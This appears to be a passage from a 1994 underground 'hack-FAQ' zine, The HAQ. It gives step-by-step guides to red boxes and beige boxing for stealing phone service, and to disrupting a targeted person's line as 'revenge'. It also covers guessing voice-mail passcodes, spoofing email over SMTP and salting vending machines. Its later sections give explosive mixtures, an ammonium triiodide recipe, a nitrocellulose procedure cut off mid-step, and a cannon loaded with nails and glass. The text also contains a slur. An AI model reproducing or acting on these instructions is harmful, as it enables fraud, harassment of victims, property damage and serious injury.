home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / haq1.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  36.1 KB  |  830 lines

  1. **
  2. Jun 13, 1994 19:54 from Belisarius
  3.  
  4.  
  5.  _____________
  6. /      /     /             ***     ***      ******       ******
  7.       /                     ***     ***    *********    *********
  8.      /       /               ***     ***  ***     ***  ***     ***
  9.     /       /                 ***********  ***********  ***     ***
  10.    /       /_____    ______    ***********  ***********  ***  ** ***
  11.   /       /     /   /_____/     ***     ***  ***     ***  ***   *****
  12.  /       /     /   /             ***     ***  ***     ***   ***********
  13. /       /     /   /______         ***     ***  ***     ***   *****   ***
  14.  
  15.  
  16.                           +---------------+
  17.                           |    THE HAQ    |
  18.                           | Edition  2.07 |
  19.                           |  11 JUN 1994  |
  20.                           +---------------+
  21.  
  22.  
  23.  
  24.                  "Knowledge is power" --Francis Bacon
  25.               "United we stand, divided we fall" --Aesop
  26.  
  27.  
  28. =+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
  29. =                                                                   =
  30. +      MatrixMage Publications.       1994    No rights reserved.   +
  31. =                                                                   =
  32. + This file may be redistributed provided that the file and this    +
  33. = notice remain intact. This article may not under any              =
  34. + circumstances be resold or redistributed for compensation of any  +
  35. = kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
  36. +                                                                   +
  37. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
  38.  
  39.  
  40.                         <*>  Edited by  <*>
  41.  
  42.  
  43.                         # Editor-in-Chief #
  44.                Belisarius < temporary loss of E-mail >
  45.           can be reached on ISCA, Shadow, SkyNET, Brinta and
  46.          Baltimore 2600 Meetings and other nameless locations.
  47.  
  48.  
  49.                 # Asst.  Editor (non communicado) #
  50.                Neurophire (on Shadow and N P on ISCA)
  51.  
  52.  
  53.                 A MatrixMage Electronic Publication
  54.  
  55.  
  56. Special Thanks to the Following Contributors:
  57. Z Maestro     RA of ISCA Underground>
  58. DINO          RA of Shadow Hack and Crack>
  59. Artimage      RA of SKYNET Underground>
  60.  
  61. Faunus        Revolution        Miska               Informatik
  62. Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
  63. Beelzebub     Redbeard          Squarewave
  64. IO            CyberSorceror     Caustic
  65. Doktor Nil    Skipster          Walrus
  66. CPT Ozone     Abort             Kyoti
  67. Carsenio      Aero              Phrack
  68.  
  69.  
  70. AND NOW A WORD FROM YOUR EDITOR:
  71.  
  72.      Throughout history mankind has been afraid of the unknown.
  73. Before lightning could be scientifically explained it was blamed on
  74. the anger of the gods.  This belief in mysticism persisted throughout
  75. the ages (and still does today).  Later as man acquired simple herbal
  76. and chemical knowledge, these men were revered as mages, users of
  77. mystical arts derived from the old gods.  But as organized religion
  78. (i.e. Christianity especially Roman Catholicism) spread and came to
  79. dominate society (became the powers that be), the mage was no longer
  80. revered.  The mage (who only sought to understand the world around
  81. himself and make the world a better place) was persecuted, attacked
  82. and driven underground by the church.  But driving these mages
  83. underground (out of society) did not stop there ideas from spreading
  84. or them from continuing to work.  The church label Copernicus as a
  85. heretic and mage and only this century has the Roman Catholic church
  86. accepted his principles (heliocentric universe) as fact.
  87.      So are 'hackers' the same today.  We surf the nets seeking
  88. knowledge and information (and hopefully understanding).  Information
  89. and understanding the meaning and import of the information are the
  90. two greatest commodities and bases of power in the world today.
  91. These things are easy to disseminate and gather in the electronic
  92. world.  The matrix (cyberspace/web/net [whichever term you choose]
  93. is able to influence and control information faster and better than
  94. ever before.  This makes many afraid of the cyberculture (not to
  95. mention a deep-seated techno-fear of many people, anything new and
  96. technical is bad).
  97.      We are a new breed of mage; seeking knowledge, desiring
  98. understanding, persecuted by the powers that be.  This is why I have
  99. started this publication.  We are the MatrixMages!  Our mission is
  100. to learn and to pass on that knowledge.
  101.  
  102.                                       -=> Belisarius <=-
  103. *********************************************************************
  104. What is 'Cyberpunk' and the Underground?
  105.  
  106. "Every time I release a phile, or write an article for a zine, it's
  107. vaguely like a baby.  It gets stored, and copied, and sent out all
  108. over the world, and people read it.  It goes into their minds.
  109. Something I created is buried in living tissue and consciousness
  110. someplace.  Eventually somebody uses it, and I know that I have the
  111. power to change the world.  Somewhere, someplace, somebody changed
  112. something using information I changed or created.  I helped to
  113. change the world."  --Unknown
  114.  
  115. That is the attitude of many of the people who, knowingly or not, are
  116. members of this hyped/wired/cyber culture.  Some who may read this
  117. will see some of their undefined beliefs, hopes and feelings
  118. reflected in the above quote.  And, as the quote says, they will
  119. help spread it.  Somewhere, somehow, that quote will change the
  120. world.
  121.  
  122. But only if you work to change it.  Remember that information and
  123. knowledge a powerful commodities.  He who has information cannot
  124. be beaten.  So above all the most important thing to do in the
  125. "Underground" is to gather information.  This means that you have to
  126. work and put in some effort.  You don't get something' for nothing!
  127. So work hard and together we can change the world!
  128.  
  129. Keep up with latest editions.  (Sorry there haven't been many lately
  130. but exams and not failing out took precedence!)
  131.  
  132. The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
  133. or any contributor are not responsible for any consequences.
  134. You use this information at your own risk.
  135.  
  136. *********************************************************************
  137.                               CONTENTS
  138. *********************************************************************
  139. Sections
  140.    I. Phone Fun
  141.        (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  142.   II. Fake E-Mail
  143.        (Fooling UUCP)
  144.  III. Social Engineering
  145.        (Free sodas, Dumpster Diving, ATMs, Carding)
  146.   IV. The Big Bang
  147.        (Making Weapons and Explosives)
  148.    V. Infection
  149.        (Virii, Trojans, Worms and other creepy crawlies)
  150.   VI. NEWBIES READ THIS
  151.        (Basic Hacking)
  152.  VII. Screwing with the most widespread operating system on the net
  153.        (UNIX / AIX Hacking)
  154. VIII. Screwing with the most secure operating system on the net
  155.        (VAX/VMS Hacking)
  156.   IX. Screwing with the most widespread operating system on PCs
  157.        (MS-DOS Hacks)
  158.    X. Finding out what that encrypted info is
  159.        (Cracking programs)
  160.   XI. How do I keep my info secure
  161.        (PGP / Cryptology)
  162.  XII. Chemistry 101
  163.        (explosive/pyrotechnic component prep)
  164. XIII. Fun things with solder, wires, and parts
  165.        (Underground electronics)
  166.  XIV. Watching television
  167.        (cable, Pay-Per-View(PPV), scrambling)
  168.   XV. Tuning in to what's on the radio waves
  169.        (Radios and Scanning)
  170.  
  171. Appendices
  172.    A. FTP sites with useful info
  173.    B. Interesting Gophers
  174.    C. Informative USENET Newsgroups
  175.    D. Publications and Zines
  176.    E. Books
  177.    F. Files and Papers
  178.    G. Cataglogs
  179.    H. PGP Keys
  180. *********************************************************************
  181.  
  182.  
  183. =====================================================================
  184. I. Phone Fun
  185.      (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  186.  
  187. WHAT IS A RED BOX AND HOW DO I MAKE ONE?
  188. (from Doktor Nil)
  189.  
  190. First note: a redbox is merely a device which plays the tone a
  191. payphone makes when you insert money. You just play it through the
  192. mike on the handset. You would think that the Phone Co. would mute
  193. the handset until you put a quarter in, and perhaps they are starting
  194. to build phones like that, but I have yet to see one.
  195.  
  196. What you need:
  197. - Radio Shack 33 memory Pocket Tone Dialer
  198. - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
  199.   below)
  200. - A solder gun.
  201. - Someone who can point out the crystal in the Tone
  202.   Dialer.
  203.  
  204. Instructions:
  205. 1) Open up the back of the tone dialer. Use screwdriver.
  206.  
  207. 2) Locate crystal. It should be toward the right side.
  208. It will be smaller than the 6.5 MHz one you bought, but otherwise
  209. vaguely similar.  It is basically capsule-shaped, with two electrodes
  210. coming out of the bottom which are soldered onto a circuit board.
  211. It's on the _left_ side, basically the third large crystal thing from
  212. the bottom, about 1.5 cm long, metallic, thin.
  213.  
  214. 3) De-solder, and de-attach, crystal. Heat the solder that the
  215. crystal is seated in; remove crystal.
  216.  
  217. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
  218. is already there from the old crystal, that way there is less chance
  219. of you dropping hot solder somewhere it shouldn't be and losing
  220. everything. Heat first one drop of solder with the solder gun, and
  221. seat one electrode of the 6.4 MHz crystal in it, then do the same
  222. with the other. This is the easiest part to mess up, be careful that
  223. both drops of solder don't run together.
  224.  
  225. 5) Put cover back on. you are done.
  226.  
  227.  
  228. How to use: Five presses of the "*" key will make the quarter sound.
  229. I think fewer presses make nickel/dime sounds, but I can't remember
  230. specifically. Here in Michigan, you can simply hold it up to the
  231. handset and press memory recall button 1 (where you have conveniently
  232. recorded five *'s -read the tone dialer directions on how to do this)
  233. and get a quarter credit, _IF_ you are calling LD. Keep making the
  234. tone to get additional credits. There is a maximum number of credits
  235. you can have at once.
  236.  
  237. To make a local call this may not work. You need to first put in a
  238. real coin, then you can use the redbox for additional credits. There
  239. may be a way around this, however: Call the operator, and ask her to
  240. dial your number for you. She should do this without asking why, it
  241. is a regular service. If you need an excuse, say the "4" key isn't
  242. working, or something. She will ask you to insert your money. At
  243. this point use the redbox. If all goes well, she dials your number
  244. and you're in business. If she says "Will you do that one more time,"
  245. or "Who is this," or any variations, hang up and walk away.
  246.  
  247. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  248.  
  249. WHAT DO THESE CRYSTALS LOOK LIKE?
  250. In most cases, a rectangular metal can with two bare wires coming out
  251. of one end, and a number like "6.50000" stamped on one side.
  252.  
  253. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  254.  
  255. WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
  256. (from Matrixx)
  257. 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
  258. is the easiest to find (Radio Shack)
  259.  
  260. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  261.  
  262. WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
  263. The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
  264. (1-800-344-4539) for more info.  The part order number from
  265. DIGI-KEY is x-415-ND
  266.  
  267. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  268.  
  269. WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
  270. (from DINO)
  271. For a Radio Shack conversion red box: a nickel is one * and a quarter
  272. is 5 *'s
  273.  
  274. Here are the freqs for a red box:
  275.  
  276. $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
  277.      with 33 millisecond pause between each pulse
  278. $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
  279.      millisecond pauses
  280. $.05 one pulse at the above freqs for 66 milliseconds!
  281.  
  282. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  283.  
  284. HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
  285. (from Faunus, Carsenio)
  286. If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
  287. is a general term for Customer owned or "Bell-independent" phone
  288. companies.  Sometimes they are more shabbily constructed than real
  289. fortress phones but others look about the same except for a lack of
  290. phone company logo.
  291.  
  292. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  293.  
  294. FOOLING COCOTS USING 800 NUMBERS?
  295. You call up an 800 number as any public phone HAS too let you dial
  296. 800 numbers for free.  Then you let the person who answers the 800
  297. number hang up on you, THEN you dial your number that you want to
  298. call free.  OK MOST COCOTs disable the keypad on the phone so you
  299. CANT just dial the number, you have to use a pocket tone dialer to
  300. dial the number.
  301.  
  302. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  303.  
  304. HOW DO I MAKE A BEIGE BOX?
  305. (from Neurophyre)
  306. Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
  307.           clips, ratchet wrench, 7/16-inch hex head
  308.  
  309.  1. Cut the head off one end of the phone cord.
  310.  2. Strip the coating back about two (2) inches.
  311.  3. Look for the red wire, and the green wire.
  312.  4. Mark one clip green and put it on the green.
  313.  5. Mark the other red and put it on the red.
  314.  6. Once you have them soldered and insulated, plug the other end
  315.     (that still has the head) into a phone.
  316.  7. Go out in the daytime and look for green bases, green rectangular
  317.     things sticking about 3 feet out of the ground with a Bell logo on
  318.     the front.  If you're a lamer, you'll waste your time with a
  319.     cable company box or something.  I've heard of it.
  320.  8. Come back to a secluded one at night.  With the wrench, open it
  321.     up.
  322.  9. Find a set of terminals (look like the threaded end of bolts
  323.     in my area) with what should be a red wire and a green wire
  324.     coming off them.
  325. 10. Plug in your beige box red to red and green to green, pick up the
  326.     phone and dial away!
  327.  
  328. Modems work too as well as taps and shit.  You're using someone
  329. else's line (unless you're an idiot) to get phone service.  Don't
  330. abuse the same line after the phone bill comes.
  331.  
  332. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  333.  
  334. BEIGE BOXING 101
  335.                          Field Phreaking
  336.                            by Revolution
  337.  
  338.      At the beginning of the section in the Bell training manual
  339. entitled "One million ways to catch and fry a phreak" it doesn't
  340. have a disclaimer saying "for informational purposes only".  So why
  341. the hell should I put one here?  Give this file to whoever you want,
  342. just make sure it all stays together, same title, same byline.
  343.  
  344.      Field phreaking gives you everything you've ever wanted: free
  345. long distance calls, free teleconferencing, hi-tech revenge, anything
  346. you can do from your own phone line and more, without paying for it,
  347. or being afraid of being traced.  Just be ready to bail if you see
  348. sirens.
  349.  
  350. How to make a beige box: Easiest box to make.  Cut your phone cord
  351. before the jack, strip the wires a little.  You should see a red
  352. (ring) wire and a green (tip) wire.  If you see yellow and black
  353. wires too just ignore them.  Put one set of alligator clips on the
  354. red wire and one on the green wire, and you're set.  (You want to
  355. use your laptop computer, but you don't want to ruin your modem's
  356. phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
  357. the back, and do the same thing as above. Now you can use a phone,
  358. laptop, anything you can plug in a jack.)
  359.  
  360. How to use: What you have is a lineman's handset.  You can use it
  361. from any bell switching apparatus (from now on sw. ap.).  These are
  362. on phone poles, where your phone line meets your house, and near
  363. payphones.  I'll go into detail below, but basically just open any
  364. box on a telephone pole, and you'll see sets of terminals (screws),
  365. with wires wrapped around them, just like on the back of a phone
  366. jack.  These screws are where you need to attach your alligator
  367. clips to get a dial tone.  Don't unscrew the screw, you'll just
  368. fuck up some poor guys line, and increase your chances of getting
  369. caught.  After the wire goes around the screw, it normally twists
  370. off into the air.  Put your clip on the end of the wire.  Do the
  371. same with the other clip.  If you don't get a dial tone, then
  372. switch terminals.
  373.  
  374. On telephone poles:
  375.  
  376. TTI terminals: These must have been built by phreaks, just for
  377. beige boxing.  By far the easiest sw. ap. use.  The only drawback
  378. is that they only connect to one phone line.  These are the fist
  379. sized gray or black boxes that appear where a single phone line
  380. meets the mother line.  They look almost like outdoor electric
  381. sockets, that have the snap up covering. They normally have the
  382. letters TTI somewhere on the front.  No bolts or screws to take
  383. off, just snap up the top and you will see four screws.  Clip in
  384. and happy phreaking.  Just click the top down and no one will ever
  385. know you were there (except for the extra digits on their phone
  386. bill.)
  387.  
  388. Green trees:  just about the hardest sw. ap. to beige from (tied
  389. with the bell canister) but if its the only one you can use, go for
  390. it.  These are the 3 foot high green/gray metal columns that are no
  391. wider than a telephone pole (which makes them different then the
  392. green bases, see below), that say "Call before digging, underground
  393. cable," or the real old ones just have a bell sign.  Usually green
  394. trees are right at the base of phone poles, or within a foot or two
  395. of them.  These normally have two 7/16 bolts on one side of the
  396. column, which have to be turned 1/8 a turn counterclockwise, and
  397. the front of the base will slide off.  Now you will see a sheet of
  398. metal with a few square holes in it, that has a bolt where the
  399. doorknob on a door would be.  Ratchet this one off and the metal
  400. sheet will swing open like a door.  On one side of the sheet will
  401. be a paper with a list of #'s this tree connects to.  Inside you'll
  402. see a mass of wires flowing from gray stalks of plastic in sets of
  403. two. The whole mass will have a black garbage bag around it, or
  404. some type of covering, but that shouldn't get in the way.  The
  405. wires come off the gray stalk, and then attach to the screws that
  406. you can beige from, somewhere near the ground at the center of the
  407. tree. These are on a little metal column, and sometimes are in a
  408. zig-zag pattern, so its hard to find the terminals that match in
  409. the right order to give you a dial tone.
  410.  
  411. Green bases: The gray/green boxes you see that look just like green
  412. trees, except they are about twice or three times as wide.  They
  413. open the same as trees, except there are always 4 bolts, and when
  414. the half slides off, inside is a big metal canister held together
  415. with like 20 bolts.  I wouldn't open it, but with a little info
  416. from friends and some social engineering, I learned that inside is
  417. where two underground phone lines are spliced together.  Also inside
  418. is either pressurized gas or gel.  Pretty messy.
  419.  
  420. Bell canisters:  attached to phone poles at waist level.  They are
  421. green (or really rusted brown) canisters about a two feet tall that
  422. have a bell insignia on the side. They will have one or two bolts
  423. at the very bottom of the canister, right above the base plate.
  424. Take the bolts off and twist the canister, and it'll slide right
  425. off.  Inside is just like a green tree, except there normally isn't
  426. the list of #'s it connects to.
  427.  
  428. Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
  429. attached to a telephone pole about three feet off the ground.  a big
  430. (foot or two diameter) cable should be coming out the top.
  431. Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
  432. cabinet with double doors.  Fasteners are located in the center of
  433. the box and on the upper edge in the center.  Both of these are
  434. held on with a 7/16 bolt.  Take the bolts off, and swing the doors
  435. open.  On the inside of the right door are instructions to connect
  436. a line, and on the inside of the left door are a list of #'s the
  437. box connects to.  And in the box are the terminals. Normally 1,000
  438. phones (yyy-sxxx, where yyy is your exchange and s is the first
  439. number of the suffix, and xxx are the 999 phones the box connects
  440. too).
  441.  
  442. On houses: follow the phone line to someone's house, and then down
  443. there wall.  Either it goes right into there house (then you're
  444. screwed) or it ends in a plastic box.  The newer boxes have a screw
  445. in the middle, which you can take off with your fingers, and then
  446. put the box back on when you're done, but the older ones are just
  447. plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
  448. black, and red and green, the two you need.  Find the Christmas
  449. colors, and phreak out.
  450.  
  451. On payphones: follow the phone line up from the phone, and sometimes
  452. you'll find a little black box with two screws in it.  Undo this,
  453. and you'll find a nice little phone jack. You don't even need your
  454. beige box for that one.  If there's not one of those, follow the
  455. wire to a wall it goes into, and sometimes there will be a sw. ap.
  456. like those on houses (see above).  Payphones are normally pretty
  457. secure now though, and you probably won't find any of those.
  458.  
  459. Phreaky things you can do:  Jesus, do I have to tell you lamers
  460. everything? Anyway, free long distance calls should be pretty easy,
  461. and get teleconferencing info from somebody else, just make sure
  462. you ANI the # you're calling from before calling Alliance.
  463.  
  464. Hi-tech revenge!
  465. Possibilities are endless, you have total control of this lamers
  466. line.  Most of you guys are probably way to elite for this one, but
  467. you can disconnect his line by loosening a few screws and ripping
  468. his wires at any sw. ap. but here's something a lot better:  Get the
  469. faggots number, and then find the mother load sw. ap. it connects
  470. to (not the sw. ap. on his house or on the telephone pole in his
  471. drive way, the _mother_load_) Find his # in the terminals, and then
  472. connect the two terminals with a paper clip or an alligator clip! His phone
  473. will be busy until ma bell
  474. figures out what the hell is going on, and since the last place
  475. they look is the mother load, this usually is at least a week.
  476. Then, of course, is the funniest prank:  Beige box from a major
  477. store, like Toys R Us (that's my favorite) and call up ma bell
  478. "Yeah, I'd like all calls to this number forwarded to (his
  479. #)"
  480.  
  481. That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
  482. phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
  483. got new info, war stories or some addictive disorder and just need
  484. somebody to talk to, E-mail revolution@delphi.com no PGP needed.
  485.  
  486. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  487.  
  488. WHAT PHONE NUMBER AM I CALLING FROM?
  489. (from Skipster, et al)
  490.  
  491. This service is called ANI.
  492.  
  493. This number may not work, but try it anyway:
  494. (800) 825-6060
  495.  
  496. You might want to try is dialing 311 ... a recorded message tells you
  497. your phone #.  Experiment, but 311 does work, if it doesn't and an
  498. operator picks up, tell her that you were dialing information and
  499. your hand must have slipped.
  500.  
  501. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  502.  
  503. HOW DO I USE/DO ALLIANCE TELECONFERENCING?
  504. (from Neurophire, Carsenio)
  505. Set one of these up, it is a 1-800 dial-in conference.  Then, grab
  506. your beige box, go to some business, preferably something like a
  507. Wal-Mart or a Radio Shack and beige box off their line.  Then call
  508. and set up a teleconference for whenever to be billed to the line
  509. you are calling from.  You'll want to know specifically what to ask
  510. for. Alliance teleconferencing is 0-700-456-1000.
  511. Dial the number (you're of course paying for this by the minute)
  512. and you get automated instructions on how to choose the number of
  513. ports for your conference call, and how to dial each participant..
  514.  
  515. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  516.  
  517. WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
  518. (from Token)
  519. Just scroll through your favorite business magazine and look for
  520. 800#s.  Once you get a VMB system you can look for a box being used
  521. and try the default passcodes <0000> , <9999> , etc.  Like on the
  522. INet, most people are too dumb to change their passwd.  If you're
  523. lucky you might get the root box (I did, the stupid ass's passwd
  524. was <4321>).
  525.  
  526.  
  527. =====================================================================
  528. II. Fake E-mail
  529.      (Fooling UUCP)
  530.  
  531. HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
  532. (from Beelzebub, Doktor Nil w/ Belisarius)
  533.  
  534. 1.  Telnet to port 25 of any internet server
  535.        (eg. telnet site.name.and.address 25)
  536. 2.  If at all possible, AVOID TYPING "HELO".
  537. 3.  Type: rcpt to (person to receive fake mail){ENTER}
  538. 4.  Type: mail from (fake name and address){ENTER}
  539. 5.  The mail server should ok each time after each name.
  540. 6.  If it does not:
  541.      a) type vrfy and then the name of the person
  542.      b) as a last resort use helo, this will login your computer as
  543.         having been the source of the mail
  544. 7.  Retype the commands, it should say ok now.
  545. 8.  Type: data{ENTER}
  546. 9.  The first line of the message will be the Subject line
  547. 10.  Enter your letter
  548. 11.  To send letter type a "." on an empty line.
  549. 12. Then type quit{ENTER}
  550. 13. This is traceable by any sysadmin ... don't harass people this
  551.     way.
  552. 14. If the person receiving the mail uses a shell like elm he/she
  553.     will not see the telltale fake message warning
  554.     "Apparently-To:(name)" even if not, most people wouldn't know
  555.     what it means anyway.
  556. 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
  557.     so as to make it look more believable and cover any add-ons the
  558.     mail routine might try
  559. 16. Put a realistic mail header in the mail message to throw people
  560.     off even more.  If there are To: and Date: lines then the
  561.     program probably won't add them on.
  562. 17. Also try to telnet to the site where the recipient has his
  563.     account.  This works better if you know how to fool it.
  564.  
  565. =====================================================================
  566. III. Social Engineering
  567.      (Free sodas, Dumpster Diving, ATMs, Carding)
  568.  
  569. WHAT DOES SALTING VENDING MACHINES DO?
  570. When you take concentrated salt water (a high concentration of salt)
  571. and squirt it into the change slot (preferably where the dollar
  572. bills come in, though some say it doesn't matter), the salt will
  573. short circuit the machine and out will pour change and hopefully
  574. sodas.
  575.  
  576. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  577.  
  578. ANOTHER WAY OF GETTING FREE SODAS?
  579. This is an easier and actually more reliable way of getting free
  580. sodas.  It only wprks pn spme machines though, usually Coca-Cola.
  581. Anyways, put in your change and as the last coin goes down the slot
  582. start rapidly and repeatedly pressing the button of your choice.
  583. If everything works well, then you should get two sodas and your
  584. change back.
  585.  
  586. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  587.  
  588. HOW ARE THE TRACKS OF ATM CARD ARRANGED?
  589.  
  590. The physical layout of the cards are standard.  The logical arrangement
  591. of the data stored on the magnetic strip varies from institution to
  592. institution.  There are some generally followed layouts, but not
  593. mandatory.
  594.  
  595. There are actually up to three tracks on a card.
  596.  
  597. Track 1:
  598. Designed for airline use.  Contains name and possibly your account
  599. number.  This is the track that is used when the ATM greets you
  600. by name.  There is alot of variation in how things are ordered so
  601. occasionally you get 'Greetings Q. John Smith' or
  602. 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
  603. This track is also used
  604. with the new airline auto check in (PSA, American, etc).
  605.  
  606. Track 2:
  607. The main operational track for online use.  The first thing
  608. on the track is the Primary Account Number (PAN).  This is usually
  609. pretty standard for all cards.  Some additional info might be on the
  610. card such as expiration date.
  611. One interesting item is the PIN (Personal Identification Number)
  612. offset.  When an ATM verifies a PIN locally, it usually uses an
  613. encryption scheme involving the PAN and a secret KEY.  This gives you
  614. a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
  615. generated).  If you want to select your own PIN, they would put the
  616. PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
  617. the Natural PIN plus the offset, and you have the selected PIN.
  618. The PIN is never in the clear on your card.  Knowing the PIN OFFSET
  619. will not give you the PIN.  This will require the SECRET KEY.
  620.  
  621. Track 3:
  622. The "OFF-LINE" ATM track.  It contains information such as your daily
  623. limit, limit left, last access, account number, and expiration date.
  624. The ATM itself could have the ability to write to this track to
  625. update information.
  626.  
  627. =====================================================================
  628. IV. The Big Bang
  629.      (Making Weapons and Explosives)
  630.  
  631. FLASH POWDERS:
  632. (from Neurophyre)
  633.  
  634. Materials: Powdered magnesium, powdered potassium nitrate
  635. 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
  636.    nitrate.
  637. 2. Light it with a long fuse cuz its so bright it might screw up your
  638.    eyes.
  639.  
  640.  REAL Cherry Bomb Powder
  641.     4 parts by weight of potassium perchlorate
  642.         1 part by weight of antimony trisulfide
  643.         1 part by weight aluminum powder
  644.  
  645.  Relatively Safe
  646.     3 parts by weight of potassium permanganate
  647.     2 parts by weight of aluminum powder
  648.  
  649.  
  650.  *VERY* Shock/Friction/Static/Heat Sensitive!
  651.  Use only if suicidal or desperate!
  652.     4 parts by weight of potassium chlorate
  653.         1 part by weight of sulfur
  654.         1 part by weight of aluminum powder
  655.  
  656. 1) To use these mixtures, SEPARATELY pulverize each ingredient into a
  657. fine powder, the finer it is, the more power you get.  Use a mortar and
  658. pestle if available, and grind GENTLY.  Do not use plastic as this can
  659. build a static charge.  Remember, do them SEPARATELY.
  660.  
  661. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  662.  
  663. AMATEUR EXPLOSIVE (Ammonium Triiodide):
  664. (from IO)
  665. WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
  666. moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
  667. The purplish iodine vapor this produces during the explosion will stain
  668. and corrode!
  669. 1) Take a small plastic bucket, add 3-4 inches of household ammonia.
  670.    This bucket will never be clean again, in all likelihood.
  671.    Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
  672.    ammonium hydroxide solution from a chemlab.  This results in better
  673.    but more sensitive, and therefore dangerous crystals.
  674. 2) Drop in iodine (like you use on scratches) one drop at a time, or,
  675.    preferably, use crystals of iodine.
  676. 3) Let it settle, then pour it through a piece of cloth, discarding
  677.    the runoff.
  678. 4) Squeeze *gently* to get out excess liquid.
  679. 5) Mold it onto the thing you want to blow up, stand **way** back.
  680. 6) Wait for it to dry, and throw a rock at it.
  681.  
  682. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  683.  
  684. HOW TO BUILD A TENNIS BALL CANNON?
  685. 1. Get six (6) tin cans.
  686. 2. From five of them remove the tops and bottoms.
  687. 3. From the last one remove only the top. (this is the last can to
  688.    make the breach)
  689. 4. The cans should overlap and be fit together to make a long barrel
  690.    closed at one end and open at the other.
  691.  
  692.                  ___________________________________
  693.     open -->    ()____)_____)_____)_____)_____)_____)    <--closed
  694.     (barrel)           1     2     3     4     5     6          (breach)
  695.  
  696. 5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
  697. 6. Put some gunpowder in the bottom of the CANnon.
  698. 7. Aim, brace the CANnon.
  699. 8. Spray hairspray or pour alcohol on the tennis ball and light.
  700. 9. Drop the ball into the can and STAND BACK!
  701.  
  702. Other ideas:
  703. a) Make explosive tennis balls.
  704. b) Launch potatoes.
  705. c) Launch thumbtacks, nails, broken glass, etc.
  706.  
  707. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  708.  
  709. HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
  710. (from Terrorist's Handbook)
  711. Materials: cotton, concentrated nitric acid, concentrated sulfuric
  712.            acid, distilled water
  713.  
  714. Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
  715.            litmus paper
  716.  
  717. Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
  718.             2.  Pour 10mL of nitric acid into beaker with sulfuric
  719.                acid.
  720.            3.  Immediately add 0.5 gram of cotton.
